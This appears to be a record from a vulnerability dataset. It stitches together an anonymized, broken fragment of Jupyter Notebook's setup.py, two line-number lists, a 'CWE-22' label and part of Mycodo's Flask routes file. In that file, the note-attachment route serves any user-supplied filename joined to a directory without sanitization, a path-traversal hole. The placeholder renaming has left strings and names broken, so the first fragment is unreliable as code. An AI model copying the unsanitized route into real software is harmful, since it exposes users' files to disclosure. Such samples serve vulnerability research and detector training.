VAR_22=VAR_2,
VAR_50=env
)
except OSError as e:
print("Failed to FUNC_7 bower: %s" % e, file=sys.stderr)
print("You can install VAR_63 dependencies with `npm install`", file=sys.stderr)
raise
if not os.path.exists(self.sanitizer_dir):
FUNC_7(['npm', 'run', 'build:webpack'], VAR_22=VAR_2, VAR_50=env)
os.utime(self.bower_dir, None)
FUNC_5(self.distribution)
def FUNC_8():
VAR_35 = VAR_1(VAR_12, 'components', 'bootstrap', 'less', 'print.less')
with open(VAR_35) as f:
VAR_51 = f.readlines()
for ix, VAR_70 in enumerate(VAR_51):
if 'Black prints faster' in VAR_70:
break
else:
return # Already patched out, nothing to do.
VAR_36 = VAR_51.pop(ix)
print("Removed line", ix, "from bootstrap print.less:")
print("-", VAR_36)
print()
with open(VAR_35, 'w') as f:
f.writelines(VAR_51)
class CLASS_2(Command):
VAR_30 = "Recompile Notebook CSS"
VAR_31 = []
def FUNC_11(self):
pass
def FUNC_12(self):
pass
VAR_37 = []
VAR_38 = []
for VAR_5 in ('ipython', 'style'):
VAR_37.append(VAR_1(VAR_12, 'style', '%VAR_4.less' % VAR_5))
VAR_38.append(VAR_1(VAR_12, 'style', '%VAR_4.min.css' % VAR_5))
def FUNC_7(self):
self.run_command('jsdeps')
VAR_50 = os.environ.copy()
VAR_50['PATH'] = VAR_13
FUNC_8()
for src, dst in zip(self.sources, self.targets):
try:
FUNC_7(['lessc',
'--source-map',
'--include-VAR_14=%s' % pipes.quote(VAR_12),
src,
dst,
], VAR_22=VAR_2, VAR_50=env)
except OSError as e:
print("Failed to build VAR_64: %s" % e, file=sys.stderr)
print("You can install VAR_63 dependencies with `npm install`", file=sys.stderr)
raise
FUNC_5(self.distribution)
class CLASS_3(Command):
VAR_30 = "Rebuild Notebook Javascript main.min.js files"
VAR_31 = [
('force', 'f', "force rebuilding VAR_63 targets"),
]
def FUNC_11(self):
self.force = False
def FUNC_12(self):
self.force = bool(self.force)
VAR_39 = ['notebook', 'tree', 'edit', 'terminal', 'auth']
VAR_38 = [ VAR_1(VAR_12, app, 'js', 'main.min.js') for app in VAR_39 ]
def VAR_37(self, VAR_5):
yield VAR_1(VAR_2, 'tools', 'build-main.js')
yield VAR_1(VAR_12, VAR_5, 'js', 'main.js')
for sec in [VAR_5, 'base', 'auth']:
for f in glob(VAR_1(VAR_12, sec, 'js', '*.js')):
if not f.endswith('.min.js'):
yield f
yield VAR_1(VAR_12, 'services', 'config.js')
if VAR_5 == 'notebook':
for f in glob(VAR_1(VAR_12, 'services', '*', '*.js')):
yield f
for parent, VAR_56, VAR_67 in os.walk(VAR_1(VAR_12, 'components')):
if os.path.basename(parent) == 'MathJax':
VAR_56[:] = []
continue
for f in VAR_67:
yield VAR_1(parent, f)
def FUNC_13(self, VAR_5, VAR_40):
if self.force or not os.path.exists(VAR_40):
return True
VAR_52 = FUNC_6(VAR_40)
for source in self.sources(VAR_5):
if FUNC_6(source) > VAR_52:
print(source, VAR_40)
return True
return False
def FUNC_16(self, VAR_5):
VAR_40 = VAR_1(VAR_12, VAR_5, 'js', 'main.min.js')
if not self.should_run(VAR_5, VAR_40):
log.info("%VAR_4 up to date" % VAR_40)
return
log.info("Rebuilding %s" % VAR_40)
FUNC_7(['node', 'tools/build-main.js', VAR_5])
def FUNC_17(self, VAR_41):
VAR_53 = VAR_41[-5:]
FUNC_7([
VAR_1('node_modules', '.bin', 'po2json'),
'-p', '-F',
'-f', 'jed1.x',
'-d', 'nbjs',
VAR_1('notebook', 'i18n', VAR_53, 'LC_MESSAGES', 'nbjs.po'),
VAR_1('notebook', 'i18n', VAR_53, 'LC_MESSAGES', 'nbjs.json'),
])
def FUNC_7(self):
self.run_command('jsdeps')
VAR_50 = os.environ.copy()
VAR_50['PATH'] = VAR_13
VAR_54 = ThreadPool()
VAR_54.map(self.build_main, self.apps)
VAR_54.map(self.build_jstranslation, glob('notebook/i18n/??_??'))
FUNC_5(self.distribution)
class CLASS_4(Command):
VAR_30 = "Write Jupyter VAR_7 to javascript"
VAR_31 = []
def FUNC_11(self):
pass
def FUNC_12(self):
pass
def FUNC_7(self):
VAR_55 = VAR_1(VAR_2, "notebook", "static", "base", "js", "namespace.js")
with open(VAR_55) as f:
VAR_51 = f.readlines()
with open(VAR_55, 'w') as f:
VAR_61 = False
for VAR_70 in VAR_51:
if VAR_70.strip().startswith("Jupyter.version"):
VAR_70 = ' Jupyter.version = "{0}";\n'.format(VAR_7)
VAR_61 = True
f.write(VAR_70)
if not VAR_61:
raise RuntimeError("Didn't find Jupyter.version VAR_70 in %s" % VAR_55)
def FUNC_9(VAR_10, VAR_18=False):
class CLASS_5(VAR_10):
def FUNC_7(self):
self.distribution.run_command('jsversion')
VAR_62 = self.distribution.get_command_obj('jsdeps')
VAR_63 = self.distribution.get_command_obj('js')
VAR_64 = self.distribution.get_command_obj('css')
VAR_62.force = VAR_63.force = VAR_18
VAR_38 = [ VAR_62.bower_dir ]
VAR_38.extend(VAR_63.targets)
VAR_38.extend(VAR_64.targets)
VAR_65 = [ t for t in VAR_38 if not os.path.exists(t) ]
if not VAR_3 and not VAR_65:
VAR_10.run(self)
return
try:
self.distribution.run_command('js')
self.distribution.run_command('css')
self.distribution.run_command('backendtranslations')
except Exception as e:
VAR_65 = [ t for t in VAR_38 if not os.path.exists(t) ]
if VAR_18 or VAR_65:
VAR_69 = os.path.commonprefix([VAR_2 + os.sep] + VAR_65)
VAR_65 = [ m[len(VAR_69):] for m in VAR_65 ]
log.warn("rebuilding VAR_63 and VAR_64 failed. The following required VAR_67 are VAR_65: %s" % VAR_65)
raise e
else:
log.warn("rebuilding VAR_63 and VAR_64 failed (not a problem)")
log.warn(str(e))
VAR_65 = [ t for t in VAR_38 if not os.path.exists(t) ]
if VAR_65:
VAR_69 = os.path.commonprefix([VAR_2 + os.sep] + VAR_65)
VAR_65 = [ m[len(VAR_69):] for m in VAR_65 ]
raise ValueError("The following required VAR_67 are VAR_65: %s" % VAR_65)
VAR_10.run(self)
return CLASS_5
| [
3,
5,
9,
10,
11,
12,
18,
25,
31,
32,
33,
34,
35,
36,
41,
45,
46,
47,
48,
55,
56,
57,
58,
59,
60,
62,
63,
66,
68,
69,
70,
74,
75,
76,
77,
78,
87,
91,
92,
93,
94,
95,
100,
101,
102,
103,
104,
110,
111,
117,
122,
123,
124,
127,
129,
130,
162,
163,
168,
169,
176,
179,
187,
200,
203,
205,
213,
215,
216,
228,
229,
232,
240,
245,
247,
248,
249,
250,
251,
255,
260,
264,
266,
267,
268,
272,
273,
274,
275,
280,
286,
288,
291,
292,
294,
295,
296,
297,
303,
304,
306,
317,
318,
320,
325,
329,
330,
336,
339,
341,
344,
347,
348,
361,
364,
368,
371,
374,
377,
383,
385,
393,
398,
403,
406,
417,
419,
421,
422,
425,
431,
437,
444,
447,
449,
454,
457,
460,
466,
471,
473,
486,
488,
489,
492,
499,
502,
505,
508,
513,
524,
529,
539,
543,
549,
560,
568,
570,
571,
576,
579,
582,
596,
597,
607,
612,
614,
615,
618,
624,
627,
635,
636,
639,
643,
646,
1,
2,
3,
4,
5,
6,
7,
8,
80,
81,
82,
97,
98,
99,
218,
231,
232,
233,
234,
242,
327,
332,
424,
425,
426,
427,
446,
447,
448,
449,
450,
451,
491,
492,
493,
494,
573,
599,
510,
541,
257,
258,
259,
260,
261,
262,
263,
264,
265
] | [
3,
5,
9,
10,
11,
12,
18,
25,
31,
32,
33,
34,
35,
36,
41,
45,
46,
47,
48,
55,
56,
57,
58,
59,
60,
62,
63,
66,
68,
69,
70,
74,
75,
76,
77,
78,
87,
91,
92,
93,
94,
95,
100,
101,
102,
103,
104,
110,
111,
117,
122,
123,
124,
127,
129,
130,
162,
163,
168,
169,
176,
179,
187,
200,
203,
205,
213,
215,
216,
228,
229,
232,
240,
245,
247,
248,
249,
250,
251,
255,
260,
264,
266,
267,
268,
272,
273,
274,
275,
280,
286,
288,
291,
292,
294,
295,
296,
297,
303,
304,
306,
317,
318,
320,
325,
329,
330,
336,
339,
341,
344,
347,
348,
361,
364,
368,
371,
374,
378,
386,
390,
392,
400,
405,
410,
413,
424,
428,
430,
431,
434,
440,
446,
453,
456,
458,
463,
466,
469,
475,
480,
482,
495,
497,
498,
501,
508,
511,
514,
517,
522,
533,
538,
548,
552,
558,
569,
577,
579,
580,
585,
588,
591,
605,
606,
616,
621,
623,
624,
627,
633,
636,
644,
645,
648,
652,
655,
1,
2,
3,
4,
5,
6,
7,
8,
80,
81,
82,
97,
98,
99,
218,
231,
232,
233,
234,
242,
327,
332,
433,
434,
435,
436,
455,
456,
457,
458,
459,
460,
500,
501,
502,
503,
582,
608,
519,
550,
257,
258,
259,
260,
261,
262,
263,
264,
265
] |
0CWE-22
| # coding=utf-8
import calendar
import datetime
import logging
import subprocess
import time
from importlib import import_module
import flask_login
import os
from dateutil.parser import parse as date_parse
from flask import Response
from flask import flash
from flask import jsonify
from flask import redirect
from flask import send_file
from flask import send_from_directory
from flask import url_for
from flask.blueprints import Blueprint
from flask_babel import gettext
from flask_limiter import Limiter
from influxdb import InfluxDBClient
from sqlalchemy import and_
from mycodo.config import DOCKER_CONTAINER
from mycodo.config import INFLUXDB_DATABASE
from mycodo.config import INFLUXDB_HOST
from mycodo.config import INFLUXDB_PASSWORD
from mycodo.config import INFLUXDB_PORT
from mycodo.config import INFLUXDB_USER
from mycodo.config import INSTALL_DIRECTORY
from mycodo.config import LOG_PATH
from mycodo.config import PATH_CAMERAS
from mycodo.config import PATH_NOTE_ATTACHMENTS
from mycodo.databases.models import Camera
from mycodo.databases.models import Conversion
from mycodo.databases.models import DeviceMeasurements
from mycodo.databases.models import Input
from mycodo.databases.models import Math
from mycodo.databases.models import NoteTags
from mycodo.databases.models import Notes
from mycodo.databases.models import Output
from mycodo.databases.models import OutputChannel
from mycodo.databases.models import PID
from mycodo.devices.camera import camera_record
from mycodo.mycodo_client import DaemonControl
from mycodo.mycodo_flask.routes_authentication import clear_cookie_auth
from mycodo.mycodo_flask.utils import utils_general
from mycodo.mycodo_flask.utils.utils_general import get_ip_address
from mycodo.mycodo_flask.utils.utils_output import get_all_output_states
from mycodo.utils.database import db_retrieve_table
from mycodo.utils.image import generate_thermal_image_from_pixels
from mycodo.utils.influx import influx_time_str_to_milliseconds
from mycodo.utils.influx import query_string
from mycodo.utils.system_pi import assure_path_exists
from mycodo.utils.system_pi import is_int
from mycodo.utils.system_pi import return_measurement_info
from mycodo.utils.system_pi import str_is_float
blueprint = Blueprint('routes_general',
__name__,
static_folder='../static',
template_folder='../templates')
logger = logging.getLogger(__name__)
limiter = Limiter(key_func=get_ip_address)
@blueprint.route('/')
def home():
"""Load the default landing page"""
try:
if flask_login.current_user.is_authenticated:
if flask_login.current_user.landing_page == 'live':
return redirect(url_for('routes_page.page_live'))
elif flask_login.current_user.landing_page == 'dashboard':
return redirect(url_for('routes_dashboard.page_dashboard_default'))
elif flask_login.current_user.landing_page == 'info':
return redirect(url_for('routes_page.page_info'))
return redirect(url_for('routes_page.page_live'))
except:
logger.error("User may not be logged in. Clearing cookie auth.")
return clear_cookie_auth()
@blueprint.route('/index_page')
def index_page():
"""Load the index page"""
try:
if not flask_login.current_user.index_page:
return home()
elif flask_login.current_user.index_page == 'landing':
return home()
else:
if flask_login.current_user.is_authenticated:
if flask_login.current_user.index_page == 'live':
return redirect(url_for('routes_page.page_live'))
elif flask_login.current_user.index_page == 'dashboard':
return redirect(url_for('routes_dashboard.page_dashboard_default'))
elif flask_login.current_user.index_page == 'info':
return redirect(url_for('routes_page.page_info'))
return redirect(url_for('routes_page.page_live'))
except:
logger.error("User may not be logged in. Clearing cookie auth.")
return clear_cookie_auth()
@blueprint.route('/settings', methods=('GET', 'POST'))
@flask_login.login_required
def page_settings():
return redirect('settings/general')
@blueprint.route('/note_attachment/<filename>')
@flask_login.login_required
def send_note_attachment(filename):
"""Return a file from the note attachment directory"""
file_path = os.path.join(PATH_NOTE_ATTACHMENTS, filename)
if file_path is not None:
try:
return send_file(file_path, as_attachment=True)
except Exception:
logger.exception("Send note attachment")
@blueprint.route('/camera/<camera_unique_id>/<img_type>/<filename>')
@flask_login.login_required
def camera_img_return_path(camera_unique_id, img_type, filename):
"""Return an image from stills or time-lapses"""
camera = Camera.query.filter(Camera.unique_id == camera_unique_id).first()
camera_path = assure_path_exists(
os.path.join(PATH_CAMERAS, '{uid}'.format(uid=camera.unique_id)))
if img_type == 'still':
if camera.path_still:
path = camera.path_still
else:
path = os.path.join(camera_path, img_type)
elif img_type == 'timelapse':
if camera.path_timelapse:
path = camera.path_timelapse
else:
path = os.path.join(camera_path, img_type)
else:
return "Unknown Image Type"
if os.path.isdir(path):
files = (files for files in os.listdir(path)
if os.path.isfile(os.path.join(path, files)))
else:
files = []
if filename in files:
path_file = os.path.join(path, filename)
return send_file(path_file, mimetype='image/jpeg')
return "Image not found"
@blueprint.route('/camera_acquire_image/<image_type>/<camera_unique_id>/<max_age>')
@flask_login.login_required
def camera_img_acquire(image_type, camera_unique_id, max_age):
"""Capture an image and return the filename"""
if image_type == 'new':
tmp_filename = None
elif image_type == 'tmp':
tmp_filename = '{id}_tmp.jpg'.format(id=camera_unique_id)
else:
return
path, filename = camera_record('photo', camera_unique_id, tmp_filename=tmp_filename)
image_path = os.path.join(path, filename)
time_max_age = datetime.datetime.now() - datetime.timedelta(seconds=int(max_age))
timestamp = os.path.getctime(image_path)
if datetime.datetime.fromtimestamp(timestamp) > time_max_age:
date_time = datetime.datetime.fromtimestamp(timestamp).strftime('%Y-%m-%d %H:%M:%S')
return_values = '["{}","{}"]'.format(filename, date_time)
else:
return_values = '["max_age_exceeded"]'
return Response(return_values, mimetype='text/json')
@blueprint.route('/camera_latest_timelapse/<camera_unique_id>/<max_age>')
@flask_login.login_required
def camera_img_latest_timelapse(camera_unique_id, max_age):
"""Capture an image and/or return a filename"""
camera = Camera.query.filter(
Camera.unique_id == camera_unique_id).first()
_, tl_path = utils_general.get_camera_paths(camera)
timelapse_file_path = os.path.join(tl_path, str(camera.timelapse_last_file))
if camera.timelapse_last_file is not None and os.path.exists(timelapse_file_path):
time_max_age = datetime.datetime.now() - datetime.timedelta(seconds=int(max_age))
if datetime.datetime.fromtimestamp(camera.timelapse_last_ts) > time_max_age:
ts = datetime.datetime.fromtimestamp(camera.timelapse_last_ts).strftime("%Y-%m-%d %H:%M:%S")
return_values = '["{}","{}"]'.format(camera.timelapse_last_file, ts)
else:
return_values = '["max_age_exceeded"]'
else:
return_values = '["file_not_found"]'
return Response(return_values, mimetype='text/json')
def gen(camera):
"""Video streaming generator function."""
while True:
frame = camera.get_frame()
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')
@blueprint.route('/video_feed/<unique_id>')
@flask_login.login_required
def video_feed(unique_id):
"""Video streaming route. Put this in the src attribute of an img tag."""
camera_options = Camera.query.filter(Camera.unique_id == unique_id).first()
camera_stream = import_module('mycodo.mycodo_flask.camera.camera_' + camera_options.library).Camera
camera_stream.set_camera_options(camera_options)
return Response(gen(camera_stream(unique_id=unique_id)),
mimetype='multipart/x-mixed-replace; boundary=frame')
@blueprint.route('/outputstate')
@flask_login.login_required
def gpio_state():
"""Return all output states"""
return jsonify(get_all_output_states())
@blueprint.route('/outputstate_unique_id/<unique_id>/<channel_id>')
@flask_login.login_required
def gpio_state_unique_id(unique_id, channel_id):
"""Return the GPIO state, for dashboard output """
channel = OutputChannel.query.filter(OutputChannel.unique_id == channel_id).first()
daemon_control = DaemonControl()
state = daemon_control.output_state(unique_id, channel.channel)
return jsonify(state)
@blueprint.route('/widget_execute/<unique_id>')
@flask_login.login_required
def widget_execute(unique_id):
"""Return the response from the execution of widget code """
daemon_control = DaemonControl()
return_value = daemon_control.widget_execute(unique_id)
return jsonify(return_value)
@blueprint.route('/time')
@flask_login.login_required
def get_time():
""" Return the current time """
return jsonify(datetime.datetime.now().strftime('%m/%d %H:%M'))
@blueprint.route('/dl/<dl_type>/<path:filename>')
@flask_login.login_required
def download_file(dl_type, filename):
"""Serve log file to download"""
if dl_type == 'log':
return send_from_directory(LOG_PATH, filename, as_attachment=True)
return '', 204
@blueprint.route('/last/<unique_id>/<measure_type>/<measurement_id>/<period>')
@flask_login.login_required
def last_data(unique_id, measure_type, measurement_id, period):
"""Return the most recent time and value from influxdb"""
if not str_is_float(period):
return '', 204
if measure_type in ['input', 'math', 'function', 'output', 'pid']:
dbcon = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
if measure_type in ['input', 'math', 'function', 'output', 'pid']:
measure = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == measurement_id).first()
else:
return '', 204
if measure:
conversion = Conversion.query.filter(
Conversion.unique_id == measure.conversion_id).first()
else:
conversion = None
channel, unit, measurement = return_measurement_info(
measure, conversion)
if hasattr(measure, 'measurement_type') and measure.measurement_type == 'setpoint':
setpoint_pid = PID.query.filter(PID.unique_id == measure.device_id).first()
if setpoint_pid and ',' in setpoint_pid.measurement:
pid_measurement = setpoint_pid.measurement.split(',')[1]
setpoint_measurement = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == pid_measurement).first()
if setpoint_measurement:
conversion = Conversion.query.filter(
Conversion.unique_id == setpoint_measurement.conversion_id).first()
_, unit, measurement = return_measurement_info(setpoint_measurement, conversion)
try:
if period != '0':
query_str = query_string(
unit, unique_id,
measure=measurement, channel=channel,
value='LAST', past_sec=period)
else:
query_str = query_string(
unit, unique_id,
measure=measurement, channel=channel,
value='LAST')
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
number = len(raw_data['series'][0]['values'])
time_raw = raw_data['series'][0]['values'][number - 1][0]
value = raw_data['series'][0]['values'][number - 1][1]
value = float(value)
# Convert date-time to epoch (potential bottleneck for data)
dt = date_parse(time_raw)
timestamp = calendar.timegm(dt.timetuple()) * 1000
live_data = '[{},{}]'.format(timestamp, value)
return Response(live_data, mimetype='text/json')
except KeyError:
logger.debug("No Data returned form influxdb")
return '', 204
except IndexError:
logger.debug("No Data returned form influxdb")
return '', 204
except Exception as e:
logger.exception("URL for 'last_data' raised and error: "
"{err}".format(err=e))
return '', 204
@blueprint.route('/past/<unique_id>/<measure_type>/<measurement_id>/<past_seconds>')
@flask_login.login_required
def past_data(unique_id, measure_type, measurement_id, past_seconds):
"""Return data from past_seconds until present from influxdb"""
if not str_is_float(past_seconds):
return '', 204
if measure_type == 'tag':
notes_list = []
tag = NoteTags.query.filter(NoteTags.unique_id == unique_id).first()
notes = Notes.query.filter(
Notes.date_time >= (datetime.datetime.utcnow() - datetime.timedelta(seconds=int(past_seconds)))).all()
for each_note in notes:
if tag.unique_id in each_note.tags.split(','):
notes_list.append(
[each_note.date_time.strftime("%Y-%m-%dT%H:%M:%S.000000000Z"), each_note.name, each_note.note])
if notes_list:
return jsonify(notes_list)
else:
return '', 204
elif measure_type in ['input', 'math', 'function', 'output', 'pid']:
dbcon = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
if measure_type in ['input', 'math', 'function', 'output', 'pid']:
measure = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == measurement_id).first()
else:
measure = None
if not measure:
return "Could not find measurement"
if measure:
conversion = Conversion.query.filter(
Conversion.unique_id == measure.conversion_id).first()
else:
conversion = None
channel, unit, measurement = return_measurement_info(
measure, conversion)
if hasattr(measure, 'measurement_type') and measure.measurement_type == 'setpoint':
setpoint_pid = PID.query.filter(PID.unique_id == measure.device_id).first()
if setpoint_pid and ',' in setpoint_pid.measurement:
pid_measurement = setpoint_pid.measurement.split(',')[1]
setpoint_measurement = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == pid_measurement).first()
if setpoint_measurement:
conversion = Conversion.query.filter(
Conversion.unique_id == setpoint_measurement.conversion_id).first()
_, unit, measurement = return_measurement_info(setpoint_measurement, conversion)
try:
query_str = query_string(
unit, unique_id,
measure=measurement,
channel=channel,
past_sec=past_seconds)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
if 'series' in raw_data and raw_data['series']:
return jsonify(raw_data['series'][0]['values'])
else:
return '', 204
except Exception as e:
logger.debug("URL for 'past_data' raised and error: "
"{err}".format(err=e))
return '', 204
@blueprint.route('/generate_thermal_image/<unique_id>/<timestamp>')
@flask_login.login_required
def generate_thermal_image_from_timestamp(unique_id, timestamp):
"""Return a file from the note attachment directory"""
ts_now = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
camera_path = assure_path_exists(
os.path.join(PATH_CAMERAS, '{uid}'.format(uid=unique_id)))
filename = 'Still-{uid}-{ts}.jpg'.format(
uid=unique_id,
ts=ts_now).replace(" ", "_")
save_path = assure_path_exists(os.path.join(camera_path, 'thermal'))
assure_path_exists(save_path)
path_file = os.path.join(save_path, filename)
dbcon = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
input_dev = Input.query.filter(Input.unique_id == unique_id).first()
pixels = []
success = True
start = int(int(timestamp) / 1000.0) # Round down
end = start + 1 # Round up
start_timestamp = time.strftime('%Y-%m-%dT%H:%M:%S.000000000Z', time.gmtime(start))
end_timestamp = time.strftime('%Y-%m-%dT%H:%M:%S.000000000Z', time.gmtime(end))
for each_channel in range(input_dev.channels):
measurement = 'channel_{chan}'.format(
chan=each_channel)
query_str = query_string(measurement, unique_id,
start_str=start_timestamp,
end_str=end_timestamp)
if query_str == 1:
logger.error('Invalid query string')
success = False
else:
raw_data = dbcon.query(query_str).raw
if not raw_data or 'series' not in raw_data or not raw_data['series']:
logger.error('No measurements to export in this time period')
success = False
else:
pixels.append(raw_data['series'][0]['values'][0][1])
# logger.error("generate_thermal_image_from_timestamp: success: {}, pixels: {}".format(success, pixels))
if success:
generate_thermal_image_from_pixels(pixels, 8, 8, path_file)
return send_file(path_file, mimetype='image/jpeg')
else:
return "Could not generate image"
@blueprint.route('/export_data/<unique_id>/<measurement_id>/<start_seconds>/<end_seconds>')
@flask_login.login_required
def export_data(unique_id, measurement_id, start_seconds, end_seconds):
"""
Return data from start_seconds to end_seconds from influxdb.
Used for exporting data.
"""
dbcon = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE, timeout=100)
output = Output.query.filter(Output.unique_id == unique_id).first()
input_dev = Input.query.filter(Input.unique_id == unique_id).first()
math = Math.query.filter(Math.unique_id == unique_id).first()
if output:
name = output.name
elif input_dev:
name = input_dev.name
elif math:
name = math.name
else:
name = None
device_measurement = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == measurement_id).first()
if device_measurement:
conversion = Conversion.query.filter(
Conversion.unique_id == device_measurement.conversion_id).first()
else:
conversion = None
channel, unit, measurement = return_measurement_info(
device_measurement, conversion)
utc_offset_timedelta = datetime.datetime.utcnow() - datetime.datetime.now()
start = datetime.datetime.fromtimestamp(float(start_seconds))
start += utc_offset_timedelta
start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
end = datetime.datetime.fromtimestamp(float(end_seconds))
end += utc_offset_timedelta
end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
query_str = query_string(
unit, unique_id,
measure=measurement, channel=channel,
start_str=start_str, end_str=end_str)
if query_str == 1:
flash('Invalid query string', 'error')
return redirect(url_for('routes_page.page_export'))
raw_data = dbcon.query(query_str).raw
if not raw_data or 'series' not in raw_data or not raw_data['series']:
flash('No measurements to export in this time period', 'error')
return redirect(url_for('routes_page.page_export'))
# Generate column names
col_1 = 'timestamp (UTC)'
col_2 = '{name} {meas} ({id})'.format(
name=name, meas=measurement, id=unique_id)
csv_filename = '{id}_{name}_{meas}.csv'.format(
id=unique_id, name=name, meas=measurement)
import csv
from io import StringIO
def iter_csv(data):
""" Stream CSV file to user for download """
line = StringIO()
writer = csv.writer(line)
writer.writerow([col_1, col_2])
for csv_line in data:
writer.writerow([
str(csv_line[0][:-4]).replace('T', ' '),
csv_line[1]
])
line.seek(0)
yield line.read()
line.truncate(0)
line.seek(0)
response = Response(iter_csv(raw_data['series'][0]['values']), mimetype='text/csv')
response.headers['Content-Disposition'] = 'attachment; filename="{}"'.format(csv_filename)
return response
@blueprint.route('/async/<device_id>/<device_type>/<measurement_id>/<start_seconds>/<end_seconds>')
@flask_login.login_required
def async_data(device_id, device_type, measurement_id, start_seconds, end_seconds):
"""
Return data from start_seconds to end_seconds from influxdb.
Used for asynchronous graph display of many points (up to millions).
"""
if device_type == 'tag':
notes_list = []
tag = NoteTags.query.filter(NoteTags.unique_id == device_id).first()
start = datetime.datetime.utcfromtimestamp(float(start_seconds))
if end_seconds == '0':
end = datetime.datetime.utcnow()
else:
end = datetime.datetime.utcfromtimestamp(float(end_seconds))
notes = Notes.query.filter(
and_(Notes.date_time >= start, Notes.date_time <= end)).all()
for each_note in notes:
if tag.unique_id in each_note.tags.split(','):
notes_list.append(
[each_note.date_time.strftime("%Y-%m-%dT%H:%M:%S.000000000Z"), each_note.name, each_note.note])
if notes_list:
return jsonify(notes_list)
else:
return '', 204
dbcon = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
if device_type in ['input', 'math', 'function', 'output', 'pid']:
measure = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == measurement_id).first()
else:
measure = None
if not measure:
return "Could not find measurement"
if measure:
conversion = Conversion.query.filter(
Conversion.unique_id == measure.conversion_id).first()
else:
conversion = None
channel, unit, measurement = return_measurement_info(
measure, conversion)
# Set the time frame to the past year if start/end not specified
if start_seconds == '0' and end_seconds == '0':
# Get how many points there are in the past year
query_str = query_string(
unit, device_id,
measure=measurement,
channel=channel,
value='COUNT')
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
count_points = raw_data['series'][0]['values'][0][1]
# Get the timestamp of the first point in the past year
query_str = query_string(
unit, device_id,
measure=measurement,
channel=channel,
limit=1)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
try:
first_point = raw_data['series'][0]['values'][0][0]
except:
return '', 204
end = datetime.datetime.utcnow()
end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
# Set the time frame to the past start epoch to now
elif start_seconds != '0' and end_seconds == '0':
start = datetime.datetime.utcfromtimestamp(float(start_seconds))
start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
end = datetime.datetime.utcnow()
end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
query_str = query_string(
unit, device_id,
measure=measurement,
channel=channel,
value='COUNT',
start_str=start_str,
end_str=end_str)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
try:
count_points = raw_data['series'][0]['values'][0][1]
except:
return '', 204
# Get the timestamp of the first point in the past year
query_str = query_string(
unit, device_id,
measure=measurement,
channel=channel,
start_str=start_str,
end_str=end_str,
limit=1)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
try:
first_point = raw_data['series'][0]['values'][0][0]
except:
return '', 204
else:
start = datetime.datetime.utcfromtimestamp(float(start_seconds))
start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
end = datetime.datetime.utcfromtimestamp(float(end_seconds))
end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
query_str = query_string(
unit, device_id,
measure=measurement,
channel=channel,
value='COUNT',
start_str=start_str,
end_str=end_str)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
try:
count_points = raw_data['series'][0]['values'][0][1]
except:
return '', 204
# Get the timestamp of the first point in the past year
query_str = query_string(
unit, device_id,
measure=measurement,
channel=channel,
start_str=start_str,
end_str=end_str,
limit=1)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
try:
first_point = raw_data['series'][0]['values'][0][0]
except:
return '', 204
start = datetime.datetime.strptime(
influx_time_str_to_milliseconds(first_point),
'%Y-%m-%dT%H:%M:%S.%f')
start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
logger.debug('Count = {}'.format(count_points))
logger.debug('Start = {}'.format(start))
logger.debug('End = {}'.format(end))
# How many seconds between the start and end period
time_difference_seconds = (end - start).total_seconds()
logger.debug('Difference seconds = {}'.format(time_difference_seconds))
# If there are more than 700 points in the time frame, we need to group
# data points into 700 groups with points averaged in each group.
if count_points > 700:
# Average period between input reads
seconds_per_point = time_difference_seconds / count_points
logger.debug('Seconds per point = {}'.format(seconds_per_point))
# How many seconds to group data points in
group_seconds = int(time_difference_seconds / 700)
logger.debug('Group seconds = {}'.format(group_seconds))
try:
query_str = query_string(
unit, device_id,
measure=measurement,
channel=channel,
value='MEAN',
start_str=start_str,
end_str=end_str,
group_sec=group_seconds)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
try:
return jsonify(raw_data['series'][0]['values'])
except:
return '', 204
except Exception as e:
logger.error("URL for 'async_data' raised and error: "
"{err}".format(err=e))
return '', 204
else:
try:
query_str = query_string(
unit, device_id,
measure=measurement,
channel=channel,
start_str=start_str,
end_str=end_str)
if query_str == 1:
return '', 204
raw_data = dbcon.query(query_str).raw
return jsonify(raw_data['series'][0]['values'])
except Exception as e:
logger.error("URL for 'async_data' raised and error: "
"{err}".format(err=e))
return '', 204
@blueprint.route('/async_usage/<device_id>/<unit>/<channel>/<start_seconds>/<end_seconds>')
@flask_login.login_required
def async_usage_data(device_id, unit, channel, start_seconds, end_seconds):
"""
